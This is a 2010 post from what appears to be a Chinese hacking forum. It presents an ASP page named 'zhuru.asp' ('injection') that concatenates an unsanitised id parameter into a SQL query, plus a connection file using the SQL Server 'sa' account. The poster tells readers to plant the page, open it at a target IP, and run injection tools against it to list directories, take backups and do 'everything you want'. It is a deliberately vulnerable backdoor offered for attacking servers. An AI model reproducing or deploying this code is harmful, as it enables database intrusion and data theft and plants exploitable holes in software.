WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2231查看
  • 0回复

主题

好友

2712

积分

禁止访问

发表于 2010-2-2 17:18:12 |显示全部楼层
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>


把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。

然后输入:http://目标IP/zhuru.asp?id=1

就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!

-----------------------------
conn.asp文件代码:


<%
strSQLServerName = "127.0.0.1" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "123456789" '数据库密码
strSQLDBName = "db_database" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-2 15:39 , Processed in 0.064667 second(s), 16 queries .

返回顶部